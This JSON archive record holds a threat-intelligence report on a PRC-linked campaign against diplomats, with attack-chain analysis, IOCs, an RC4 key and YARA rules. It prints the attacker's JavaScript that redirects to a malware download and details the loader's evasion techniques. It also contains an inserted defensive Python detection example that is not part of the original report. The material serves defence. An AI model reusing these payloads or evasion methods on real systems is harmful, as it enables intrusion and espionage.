{
	"id": "e813db0c-0e8b-46d6-9540-9ebdc5f3e49f",
	"created_at": "2026-04-06T00:14:56.406394Z",
	"updated_at": "2026-04-10T03:36:33.744646Z",
	"deleted_at": null,
	"sha1_hash": "919c2559685350434cb4e22aacb7bcc78ea20c25",
	"title": "PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1116144,
	"plain_text": "PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target\r\nDiplomats\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-08-25 · Archived: 2026-04-02 10:53:31 UTC\r\nWritten by: Patrick Whitsell\r\nIn March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the\r\nPRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG\r\nassesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People's\r\nRepublic of China (PRC). \r\nThe campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that\r\nGTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also\r\nknown as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing\r\ncertificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.\r\nGoogle is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all\r\nGmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for\r\nChrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified\r\ndomains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google\r\nSecurity Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this\r\nactivity in their environments.\r\nOverview\r\nThis blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat\r\nactor’s operational capabilities. 
We examine how the malware is delivered, how the threat actor used social engineering and evasion techniques, and the technical details of the multi-stage malware payloads.\r\nIn this campaign, the malware payloads were disguised as software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high-level overview of the attack chain:\r\n1. The target’s web browser tests whether the internet connection is behind a captive portal;\r\n2. An AitM redirects the browser to a threat-actor-controlled website;\r\n3. The first-stage malware, STATICPLUGIN, is downloaded;\r\n4. STATICPLUGIN retrieves an MSI package from the same website;\r\n5. Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/\r\nPage 1 of 13\r\n\r\nFigure 1: Attack chain diagram\r\nMalware Delivery: Captive Portal Hijack\r\nGTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe plugin update to targeted entities. A captive portal is a network setup that directs users to a specific web page, usually a login or splash page, before granting internet access. Browsers detect captive portals deliberately: Chrome sends an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) and expects an empty 204 No Content response. Any other answer, such as a redirect, makes the browser treat the network as captive and present the page it was redirected to as the portal’s sign-in page. Because the probe is sent over plain HTTP, any device on the network path can answer it in gstatic.com’s place.\r\nWhile “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing web page and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks.
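As an added example (not code from the GTIG report), the following Python triages captured responses to Chrome's captive-portal probe: an empty 204 is the expected answer, while a redirect to a host outside the operator's own portal allowlist (the `expected_portals` argument and the `portal.corp.example` hostname are assumptions) or an injected 200 page means something on the path answered in gstatic.com's place. The sample responses are constructed to mirror the redirect chain in Figure 2; the landing domain from the IOC appendix is written undefanged so that urlsplit can parse the hostname.

```python
# Added example: triage answers to Chrome's captive-portal probe.
# Chrome requests http://www.gstatic.com/generate_204 and expects an empty
# HTTP 204; any other answer was produced by something on the path.
from urllib.parse import urlsplit

PROBE_URL = 'http://www.gstatic.com/generate_204'
CRLF = chr(13) + chr(10)  # HTTP line terminator, built without escape sequences


def parse_http_response(raw):
    # Split raw HTTP/1.x response text into (status, headers, body).
    lines = raw.split(CRLF)
    status = int(lines[0].split()[1])
    headers = {}
    i = 1
    while i < len(lines) and lines[i] != '':
        name, _, value = lines[i].partition(':')
        headers[name.strip().lower()] = value.strip()
        i += 1
    body = CRLF.join(lines[i + 1:])
    return status, headers, body


def classify_probe(raw, expected_portals=()):
    # Verdict for one probe response. expected_portals: hostnames of captive
    # portals the operator knows are legitimate (assumed, operator-maintained).
    status, headers, body = parse_http_response(raw)
    if status == 204 and body == '':
        return 'clean', 'probe answered as expected'
    if 300 <= status < 400 and 'location' in headers:
        host = (urlsplit(headers['location']).hostname or '').lower()
        if host in expected_portals:
            return 'captive_portal', host
        return 'intercepted', headers['location']
    # A 200 (or anything else) with content means a page was injected.
    return 'intercepted', 'status %d with %d body bytes' % (status, len(body))


def follow_chain(start_url, responses, max_hops=5):
    # Walk a redirect chain offline; responses maps URL -> raw response text.
    # Stops at the first non-redirect, at a loop, or after max_hops.
    chain = [start_url]
    url = start_url
    for _ in range(max_hops):
        raw = responses.get(url)
        if raw is None:
            break
        status, headers, _ = parse_http_response(raw)
        if not (300 <= status < 400 and 'location' in headers):
            break
        url = headers['location']
        if url in chain:
            break
        chain.append(url)
    return chain


# Constructed sample responses (not captured traffic) modelled on Figure 2:
# the probe is bounced off gstatic.com to the campaign landing page.
LANDING = 'https://mediareleaseupdates.com/AdobePlugins.html'
CLEAN = CRLF.join(['HTTP/1.1 204 No Content', 'Content-Length: 0', '', ''])
PORTAL = CRLF.join(['HTTP/1.1 302 Found', 'Location: http://portal.corp.example/login', '', ''])
HIJACKED = {
    PROBE_URL: CRLF.join(['HTTP/1.1 302 Found', 'Location: ' + LANDING, '', '']),
    LANDING: CRLF.join(['HTTP/1.1 200 OK', 'Content-Type: text/html', '',
                        '<html><body>Install Missing Plugins</body></html>']),
}

if __name__ == '__main__':
    print(classify_probe(CLEAN))
    print(classify_probe(PORTAL, expected_portals=('portal.corp.example',)))
    print(classify_probe(HIJACKED[PROBE_URL]))
    print(follow_chain(PROBE_URL, HIJACKED))
```

On a real network, feed it the raw probe responses captured on the client side of the edge device and compare the redirect target against the portal you actually operate; a redirect from the probe to a freshly registered HTTPS domain that then serves an executable is exactly the pattern this campaign used.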
GTIG did not observe the attack vector used to compromise the edge devices.\r\nFigure 2: Captive portal redirect chain\r\nFake Plugin Update\r\nOnce the browser has been redirected, the threat actor tries to convince the target that a software update is needed and that the malware, disguised as a “plugin update”, should be downloaded. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.\r\nThe landing web page resembles a legitimate software update site and is served over HTTPS with a valid TLS certificate issued by Let’s Encrypt. HTTPS helps the operation in two ways: the browser shows no “Not Secure” or “Your connection is not private” warning, and the connection is encrypted, so network-based defenses cannot inspect or detect the malicious traffic without TLS interception. A valid certificate from a public CA proves only control of the domain name; it says nothing about the intent of the site.
Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a public Certificate Authority.\r\n$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256\r\nCertificate:\r\n    Data:\r\n        Version: 3 (0x2)\r\n        Serial Number:\r\n            05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd\r\n        Signature Algorithm: sha256WithRSAEncryption\r\n        Issuer: C=US, O=Let's Encrypt, CN=R10\r\n        Validity\r\n            Not Before: May 17 16:58:11 2025 GMT\r\n            Not After : Aug 15 16:58:10 2025 GMT\r\n        Subject: CN=mediareleaseupdates[.]com\r\nsha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68\r\nFigure 3: Website TLS certificate\r\nThe initial landing page is completely blank apart from a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered payload.\r\nFigure 4: Malware landing page (image title: “Additional plugins are required to display all the media on this page”)\r\nIn the background, JavaScript is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button, “myFunction”, defined in that script, is executed.\r\nfunction myFunction() {\r\n    window.location.href = \"https[:]//mediareleaseupdates[.]com/AdobePlugins.exe\";\r\n}\r\nFigure 6: JavaScript from style3.js\r\nAssigning the download URL to window.location.href triggers the automatic download of “AdobePlugins.exe”; the script also swaps in a new background image on the page. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.\r\nFigure 7: Malware landing page post-download\r\nWhen the downloaded executable is run, the fake install prompt seen in the screenshot above for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.\r\nMalware Analysis\r\nUpon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor's command and control (C2) server.\r\nDigitally Signed Downloader: STATICPLUGIN\r\nThe downloaded “AdobePlugins.exe” file is a first-stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that extend trust to any file carrying a valid digital signature. A valid signature proves only that the signer held the private key, not that the signer is trustworthy; the trust decision should rest on the signer’s identity rather than on signature validity. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.\r\nThe binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use.
While the signing certificate expired on July 14th, 2025 and can no longer be used to sign new binaries, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates. Note that expiry alone does not neutralise samples that were signed and timestamped during the validity period, since Windows normally continues to validate timestamped Authenticode signatures after the certificate expires; revocation is what invalidates them.\r\nFigure 8: Downloader with valid digital signature\r\nSTATICPLUGIN implements a custom TForm (a Delphi VCL form) designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows Installer COM object (WindowsInstaller.Installer) to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. Despite its extension, the “BMP” file is actually an MSI package containing three files; checking the file’s magic bytes rather than its extension exposes this. After installation of these files, CANONSTAGER is executed via DLL side-loading.\r\nFilename | Description | SHA-256\r\ncnmpaui.exe | Canon IJ Printer Assistant Tool (legitimate host binary for the side-load) | 4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3\r\ncnmpaui.dll | CANONSTAGER | e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011\r\ncnmplog.dat | RC4-encrypted SOGU.SEC | cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79\r\nCertificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd\r\nOur investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.\r\nGTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they share multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates:\r\n1. Delivery through web-based redirects\r\n2. Downloader first stage, sometimes packaged in an archive\r\n3. In-memory droppers and memory-only backdoor payloads\r\n4. Masquerading as legitimate applications or updates\r\n5. Targeting in Southeast Asia\r\nIt remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, it may also be a willing participant or a front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.\r\nMalicious Launcher: CANONSTAGER\r\nOnce CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.\r\nAPI Hashing and Thread Local Storage\r\nThread Local Storage (TLS; here the Windows threading feature, not Transport Layer Security) is intended to give each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.\r\nIn short, the API hashing hides which Windows APIs are being used (the import table does not name them; only hash constants appear in the code), while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional.
Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.\r\nBelow is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryW function address:\r\n1. Resolve the GetCurrentDirectoryW hash (0x6501CBE1) to the function’s address\r\n2. Get the location of the TLS array from the Thread Information Block (TIB)\r\n3. Move the resolved function address into offset 0x8 of the TLS array\r\nFigure 9: Example of storing function addresses in TLS array\r\nIndirect Code Execution\r\nCANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly through the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside the window procedure and triggering execution asynchronously: no direct call to the launcher code appears in the binary, only a window registration and a message dispatch.\r\nAt a high level, CANONSTAGER:\r\n1. Registers a window class containing a callback function (the window procedure);\r\n2. Creates a new window with the registered class;\r\n3. Sends WM_SHOWWINDOW to that window;\r\n4. Enters a message loop to receive and dispatch messages to the created window;\r\n5. Creates a new thread to decrypt “cnmplog.dat” into SOGU.SEC when the window procedure receives WM_SHOWWINDOW; then\r\n6. Executes SOGU.SEC in memory through an EnumSystemGeoID callback.\r\nFigure 10: Overview of CANONSTAGER execution using Windows message queue\r\nWindow Procedure\r\nOn a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to windows of the specified class.
\r\nCANONSTAGER creates an overlapped window from a registered WNDCLASS structure whose lpfnWndProc field points to the malware’s own window procedure for processing messages. Additionally, the window is created with a height and width of zero so that it never appears on screen.\r\nInside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created running a function that decrypts and launches the SOGU.SEC payload. For any message type other than 0x0018 (or 0x0002, WM_DESTROY, on which it calls ExitProcess), the window procedure hands the message to the default handler (DefWindowProc), effectively ignoring it.\r\nMessage Queue\r\nWindows applications use message queues for asynchronous communication. Both user applications and the Windows system can post messages to message queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.\r\nTo trigger the malicious window procedure, CANONSTAGER calls ShowWindow on its newly created window, which causes a WM_SHOWWINDOW (0x0018) message to be delivered to that window. Since the system, or other applications, may also post messages to CANONSTAGER’s window, a standard Windows message loop is entered. This allows all posted messages to be dispatched, including the intended WM_SHOWWINDOW message:\r\n1. GetMessageW retrieves the next message from the thread’s message queue.\r\n2. TranslateMessage converts virtual-key messages into character messages.\r\n3. DispatchMessage delivers the message to the window procedure of the window it targets.\r\n4. Loop back to 1 until GetMessageW returns zero (a WM_QUIT message was retrieved), so that every queued message is dispatched.\r\nDeploying SOGU.SEC\r\nAfter the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps:\r\n1. Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;\r\n2. Decrypt the file with a hardcoded 16-byte RC4 key (listed under Host Indicators in the appendix);\r\n3. Execute the decrypted payload through an EnumSystemGeoID callback function.\r\nFigure 11: Callback function executing SOGU.SEC\r\nUNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in memory, so the decrypted backdoor never touches disk and file-based endpoint detections do not see it; exposing it requires memory scanning or decrypting cnmplog.dat with the RC4 key recovered from CANONSTAGER.\r\nThe Backdoor: SOGU.SEC\r\nSOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. It is a sophisticated and heavily obfuscated backdoor with a wide range of capabilities: it can collect system information, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” over HTTPS.\r\nAttribution\r\nGTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the PRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TTPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex both target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed delivering SOGU.SEC from DLL side-loaded launchers and have used the same C2 infrastructure.\r\nConclusion\r\nThis campaign is a clear example of the continued evolution of UNC6384's operational capabilities and highlights the sophistication of PRC-nexus threat actors.
The use of advanced techniques such as AitM combined with valid code signing and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection.\r\nGTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.\r\nAcknowledgment\r\nA special thanks to Jon Daniels for your contributions.\r\nAppendix: Indicators of Compromise\r\nA Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.\r\nFile Hashes\r\nName | Hash (SHA-256)\r\nAdobePlugins.exe | 65c42a7ea18162a92ee982eded91653a5358a7129c7672715ce8ddb6027ec124\r\n20250509.bmp (MSI) | 3299866538aff40ca85276f87dd0cefe4eafe167bd64732d67b06af4f3349916\r\ncnmpaui.dll | e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011\r\ncnmplog.dat | cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79\r\nSOGU.SEC (memory only) | d1626c35ff69e7e5bde5eea9f9a242713421e59197f4b6d77b914ed46976b933\r\nCertificate Fingerprints / Thumbprints\r\nName | Hash (SHA-1)\r\nmediareleaseupdates[.]com | c8744b10180ed59bf96cf79d7559249e9dcf0f90\r\nAdobePlugins.exe | eca96bd74fb6b22848751e254b6dc9b8e2721f96\r\nNetwork Indicators\r\nName | IOC\r\nLanding Page | https[:]//mediareleaseupdates[.]com/AdobePlugins[.]html\r\nJavaScript | https[:]//mediareleaseupdates[.]com/style3[.]js\r\nSTATICPLUGIN | https[:]//mediareleaseupdates[.]com/AdobePlugins[.]exe\r\nMSI Package | https[:]//mediareleaseupdates[.]com/20250509[.]bmp\r\nHosting IP | 103.79.120[.]72\r\nC2 IP | 166.88.2[.]90\r\nSOGU.SEC User Agent | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\nHost Indicators\r\nName | IOC\r\nMutex Name | KNbgxngdS\r\nRC4 Key | mqHKVbHWWAJwrLXD\r\nRegistry Key | HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CanonPrinter=\"%APPDATA%\\cnmpaui.exe\"\r\nFile Path | %LOCALAPPDATA%\\DNVjzaXMFO\\\r\nFile Path | C:\\Users\\Public\\Intelnet\\\r\nFile Path | C:\\Users\\Public\\SecurityScan\\\r\nYARA Rules\r\nrule G_Downloader_STATICPLUGIN_1 {\r\n    meta:\r\n        author = \"GTIG\"\r\n        date_created = \"2025-07-24\"\r\n        date_modified = \"2025-07-24\"\r\n        description = \"STATICPLUGIN is a downloader observed to retrieve an MSI packaged payload from a hard-coded C2\"\r\n        md5 = \"52f42a40d24e1d62d1ed29b28778fc45\"\r\n        rev = 1\r\n    strings:\r\n        $s1 = \"InstallRemoteMSI\"\r\n        $s2 = \"InstallUpdate\"\r\n        $s3 = \"Button1Click\"\r\n        $s4 = \"Button2Click\"\r\n        $s5 = \"WindowsInstaller.Installer\" wide\r\n    condition:\r\n        uint16(0)==0x5a4d and all of them\r\n}\r\nrule G_Launcher_CANONSTAGER_1 {\r\n    meta:\r\n        author = \"GTIG\"\r\n        date_created = \"2025-07-25\"\r\n        date_modified = \"2025-07-25\"\r\n        description = \"CANONSTAGER is a side-loaded DLL launcher used to decrypt and execute a payload in-memory.\"\r\n        md5 = \"fa71d60e43da381ad656192a41e38724\"\r\n        rev = 1\r\n    strings:\r\n        $str1 = \".dat\" wide\r\n        $str2 = \"\\\\cnmplog\" wide\r\n        $code1 = {43 0F B6 ?? 0F B6 [3]00 D0 0F B6 ?? 8A 74 [2]88 74 [2]88 54 [2]8B 7? [2]02 54 [2]0F B6 ?? 0F B6 [3]3\r\n        $code2 = {0F B6 [3] 89 ?? 83 E? 0F 00 D0 02 ?? [1-2] 0F B6 ?? 8A 74 [2] 88 74 [2] 4? 88 54 [2]81 F? 00 01 00 0\r\n        $code3 = {40 89 ?? 0F B6 C0 0F B6 [3]00 D9 88 9? [4-5]0F B6 F? 8A 7C 3? ?? 88 7C 0? ?? 88 5C 3? ?? 02 5C 0? ??\r\n    condition:\r\n        all of ($str*) and 2 of ($code*)\r\n}\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/"
	],
	"report_names": [
		"prc-nexus-espionage-targets-diplomats"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20b5fa2f-2ef1-4e69-8275-25927a762f72",
			"created_at": "2025-08-07T02:03:24.573647Z",
			"updated_at": "2026-04-10T02:00:03.765721Z",
			"deleted_at": null,
			"main_name": "BRONZE DUDLEY",
			"aliases": [
				"TA428 ",
				"Temp.Hex ",
				"Vicious Panda "
			],
			"source_name": "Secureworks:BRONZE DUDLEY",
			"tools": [
				"NCCTrojan",
				"PhantomNet",
				"PoisonIvy",
				"Royal Road"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e09a03a6-ce6c-4f6b-b8c6-38c3edecd743",
			"created_at": "2026-01-20T02:00:03.665377Z",
			"updated_at": "2026-04-10T02:00:03.915084Z",
			"deleted_at": null,
			"main_name": "UNC6384",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6384",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434496,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.pdf",
		"text": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.txt",
		"img": "https://archive.orkl.eu/919c2559685350434cb4e22aacb7bcc78ea20c25.jpg"
	}
}